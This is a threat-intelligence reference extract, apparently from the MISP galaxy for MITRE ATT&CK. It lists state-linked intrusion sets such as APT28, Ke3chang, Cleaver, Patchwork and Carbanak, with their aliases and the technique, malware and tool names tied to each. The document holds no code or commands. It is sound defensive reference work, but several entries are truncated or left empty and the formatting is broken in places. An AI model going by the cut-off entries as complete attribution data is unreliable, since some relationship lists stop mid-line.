[APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034).

The tag is: *misp-galaxy:mitre-intrusion-set="APT28 - G0007"

APT28 - G0007 is also known as:

- APT28
- SNAKEMACKEREL
- Swallowtail
- Group 74
- Sednit
- Sofacy
- Pawn Storm
- Fancy Bear
- STRONTIUM
- Tsar Team
- Threat Group-4127
- TG-4127

APT28 - G0007 has relationships with:

- similar: *misp-galaxy:microsoft-activity-group="STRONTIUM"* with estimative-language:likelihood-probability="likely"
- similar: *misp-galaxy:threat-actor="Sofacy"* with estimative-language:likelihood-probability="likely"
- uses: *misp-galaxy:mitre-malware="USBStealer - S0136"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-malware="HIDEDRV - S0135"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-tool="Mimikatz - S0002"* with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Responder - S0174" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="JHUHUGIT - S0044" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="DealersChoice - S0243" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="ADVSTORESHELL - S0045" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Bootkit - T1542.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="OLDBAIT - S0138" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="certutil - S0160" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="XAgentOSX - S0161" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Communication Through Removable Media - T1092" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="XTunnel - S0117" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Winexe - S0191" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Koadic - S0250" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Zebrocy - S0251" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Forfiles - S0193" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="CORESHELL - S0137" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="CHOPSTICK - S0023" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Komplex - S0162" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="LoJax - S0397" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Downdelph - S0134" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Fysbis - S0410" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Steal Application Access Token - T1528" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="Drovorub - S0502" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Denial of Service - T1498" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Domains - T1583.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Phishing for Information - T1598" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials - T1589.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="X-Agent for Android - S0314" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obtain/re-use payloads - T1346" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Buy domain name - T1328" with estimative-language:likelihood-probability="almost-certain"

Table 4307. Table References

<table>
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<tr>
<th>Links</th>
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<td><a href="https://attack.mitre.org/groups/G0007">https://attack.mitre.org/groups/G0007</a></td>
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</tbody>
</table>
Equation - G0020

[Equation](https://attack.mitre.org/groups/G0020) is a sophisticated threat group that employs multiple remote access tools. The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives. (Citation: Kaspersky Equation QA)

The tag is: *misp-galaxy:mitre-intrusion-set="Equation - G0020"*

Equation - G0020 is also known as:

- Equation

Equation - G0020 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Component Firmware - T1109"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Environmental Keying - T1480.001"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Hidden File System - T1564.005"* with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0020">https://attack.mitre.org/groups/G0020</a></td>
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</table>
Moafee - G0002

[Moafee](https://attack.mitre.org/groups/G0002) is a threat group that appears to operate from the Guandong Province of China. Due to overlapping TTPs, including similar custom tools, Moafee is thought to have a direct or indirect relationship with the threat group [DragonOK](https://attack.mitre.org/groups/G0017). (Citation: Haq 2014)

The tag is: `misp-galaxy:mitre-intrusion-set="Moafee - G0002"`

Moafee - G0002 is also known as:

- Moafee

Moafee - G0002 has relationships with:

- similar: `misp-galaxy:threat-actor="DragonOK"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001"` with estimative-language:likelihood-probability="almost-certain"

Table 4309. Table References

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<th>Links</th>
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<td><a href="https://attack.mitre.org/groups/G0002">https://attack.mitre.org/groups/G0002</a></td>
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</table>

Ke3chang - G0004

[Ke3chang](https://attack.mitre.org/groups/G0004) is a threat group attributed to actors operating out of China. [Ke3chang](https://attack.mitre.org/groups/G0004) has targeted several industries, including oil, government, military, and more. (Citation: Villeneuve et al 2014) (Citation: NCC Group APT15 Alive and Strong) (Citation: APT15 Intezer June 2018)

The tag is: `misp-galaxy:mitre-intrusion-set="Ke3chang - G0004"`

Ke3chang - G0004 is also known as:

- Ke3chang
- APT15
- Mirage
- Vixen Panda
- GREF
- Playful Dragon
RoyalAPT

Ke3chang - G0004 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Systeminfo - S0096" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Tasklist - S0057" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="MirageFox - S0280" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Golden Ticket - T1558.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-
• uses: misp-galaxy:mitre-tool="netstat - S0104" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="spwebmember - S0227" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Sharepoint - T1213.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Ping - S0097" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Right-to-Left Override - T1036.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with
Cleaver - G0003

[Cleaver](https://attack.mitre.org/groups/G0003) is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. (Citation: Cylance Cleaver) Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). (Citation: Dell Threat Group 2889)

The tag is: `misp-galaxy:mitre-intrusion-set="Cleaver - G0003"`

Cleaver - G0003 is also known as:

- Cleaver
- Threat Group 2889
- TG-2889

Cleaver - G0003 has relationships with:

- similar: `misp-galaxy:threat-actor="Cutting Kitten"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:threat-actor="Cleaver"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:threat-actor="OilRig"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:threat-actor="Clever Kitten"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:threat-actor="CHRYSENE"` with `estimative-language:likelihood-probability="likely"`
- similar: `misp-galaxy:threat-actor="Flying Kitten"` with `estimative-language:likelihood-probability="likely"`
• similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"
• uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="TinyZBot - S0004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="Net Crawler - S0056" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Social Media Accounts - T1585.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="ARP Cache Poisoning - T1557.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscation or cryptography - T1313" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Build social network persona - T1341" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Develop social network persona digital footprint - T1342" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Create custom payloads - T1345" with estimative-language:likelihood-probability="almost-certain"

Table 4311. Table References

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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://attack.mitre.org/groups/G0003">https://attack.mitre.org/groups/G0003</a></td>
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</table>
Patchwork - G0040

[Patchwork](https://attack.mitre.org/groups/G0040) is a cyberespionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://attack.mitre.org/groups/G0040) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://attack.mitre.org/groups/G0040) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018. (Citation: Cymmetria Patchwork) (Citation: Symantec Patchwork) (Citation: TrendMicro Patchwork Dec 2017) (Citation: Volexity Patchwork June 2018)

The tag is: `misp-galaxy:mitre-intrusion-set= "Patchwork - G0040"

Patchwork - G0040 is also known as:

- Patchwork
- Hangover Group
- Dropping Elephant
- Chinastrats
- MONSOON
- Operation Hangover

Patchwork - G0040 has relationships with:

- similar: misp-galaxy:threat-actor="Dropping Elephant" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-malware="NDiskMonitor - S0272" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Unknown Logger - S0130" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="BADNEWS - S0128" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="AutoIt backdoor - S0129" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="PowerSploit - S0194" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="TINYTYPOHON - S0131" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="QuasarRAT - S0262" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="BackConfig - S0475" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

Table 4312. Table References

Links

https://attack.mitre.org/groups/G0040
Carbanak - G0008

[Carbanak](https://attack.mitre.org/groups/G0008) is a threat group that mainly targets banks. It also refers to malware of the same name ([Carbanak](https://attack.mitre.org/software/S0030)). It is sometimes referred to as [FIN7](https://attack.mitre.org/groups/G0046), but these appear to be two groups using the same [Carbanak](https://attack.mitre.org/software/S0030) malware and are therefore tracked separately. (Citation: Kaspersky Carbanak) (Citation: FireEye FIN7 April 2017)

The tag is: misp-galaxy:mitre-intrusion-set="Carbanak - G0008"

Carbanak - G0008 is also known as:

- Carbanak
- Anunak
- Carbon Spider

Carbanak - G0008 has relationships with:

- similar: misp-galaxy:threat-actor="FIN7" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-
Table 4313. Table References

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<td><a href="https://attack.mitre.org/groups/G0008">https://attack.mitre.org/groups/G0008</a></td>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html">https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html</a></td>
</tr>
<tr>
<td><a href="https://www.crowdstrike.com/blog/state-criminal-address/">https://www.crowdstrike.com/blog/state-criminal-address/</a></td>
</tr>
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</table>

**WIRTE - G0090**

[WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. The group focuses on targeting Middle East defense and diplomats.(Citation: Lab52 WIRTE Apr 2019)

The tag is: `misp-galaxy:mitre-intrusion-set="WIRTE - G0090"`

WIRTE - G0090 is also known as:

- WIRTE

WIRTE - G0090 has relationships with:
Frankenstein - G0101

[Frankenstein](https://attack.mitre.org/groups/G0101) is a campaign carried out between January and April 2019 by unknown threat actors. The campaign name comes from the actors' ability to piece together several unrelated components. [Citation: Talos Frankenstein June 2019]

The tag is: *misp-galaxy:mitre-intrusion-set="Frankenstein - G0101"*

Frankenstein - G0101 is also known as:

- Frankenstein

Frankenstein - G0101 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="MSBuild - T1127.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
PittyTiger - G0011

PittyTiger - G0011 is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control. (Citation: Bizeul 2014) (Citation: Villeneuve 2014)

The tag is: misp-galaxy:mitre-intrusion-set="PittyTiger - G0011"

PittyTiger - G0011 is also known as:

• PittyTiger

PittyTiger - G0011 has relationships with:

• similar: misp-galaxy:threat-actor="Pitty Panda" with estimative-language:likelihood-probability="likely"
• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="PoisonIvy - S0012" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="Lurid - S0010" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="gsecdump - S0008" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
APT16 - G0023

[APT16](https://attack.mitre.org/groups/G0023) is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. (Citation: FireEye EPS Awakens Part 2)

The tag is: `misp-galaxy:mitre-intrusion-set="APT16 - G0023"`

APT16 - G0023 is also known as:

- APT16

APT16 - G0023 has relationships with:

- uses: `misp-galaxy:mitre-malware="ELMER - S0064"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Compromise 3rd party infrastructure to support delivery - T1334"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Identify business relationships - T1272"` with estimative-language:likelihood-probability="almost-certain"

Table 4317. Table References

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<tr>
<td><a href="https://attack.mitre.org/groups/G0023">https://attack.mitre.org/groups/G0023</a></td>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html">https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html</a></td>
</tr>
</tbody>
</table>

APT17 - G0025

[APT17](https://attack.mitre.org/groups/G0025) is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. (Citation: FireEye APT17)

The tag is: `misp-galaxy:mitre-intrusion-set="APT17 - G0025"`

APT17 - G0025 is also known as:

- APT17
- Deputy Dog

APT17 - G0025 has relationships with:

- similar: `misp-galaxy:threat-actor="Axiom"` with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:threat-actor="Aurora Panda" with estimative-language:likelihood-probability="likely"

• uses: misp-galaxy:mitre-malware="BLACKCOFFEE - S0069" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Services - T1583.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Establish Accounts - T1585" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Develop social network persona digital footprint - T1342" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Build social network persona - T1341" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1331" with estimative-language:likelihood-probability="almost-certain"

Table 4318. Table References

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<td><a href="https://attack.mitre.org/groups/G0025">https://attack.mitre.org/groups/G0025</a></td>
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</table>

**APT18 - G0026**

